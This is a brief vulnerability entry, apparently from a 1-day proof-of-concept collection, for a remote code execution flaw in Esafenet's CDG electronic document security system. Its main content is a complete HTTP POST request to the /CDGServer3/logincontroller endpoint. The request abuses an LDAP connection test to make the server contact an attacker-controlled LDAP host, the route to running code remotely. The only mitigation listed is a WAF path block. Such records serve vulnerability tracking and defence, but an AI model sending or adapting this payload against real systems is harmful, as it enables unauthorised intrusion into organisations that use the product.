vendor = "亿赛通"
name = "亿赛通新一代电子文档安全管理系统远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/CDGServer3/logincontroller"
detail = "POST /CDGServer3/logincontroller HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Connection: close fromurl=/LdapAjax&token=1&command=testConnection&hosts=ldap://192.168.10.1:1379/CN=account,OU=exp,DC=exp,DC=com&users=account&dns=CN=account,OU=exp,DC=exp,DC=com&dns2=OU=exp,DC=exp,DC=com&type=0&pwds=123456"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "1day"
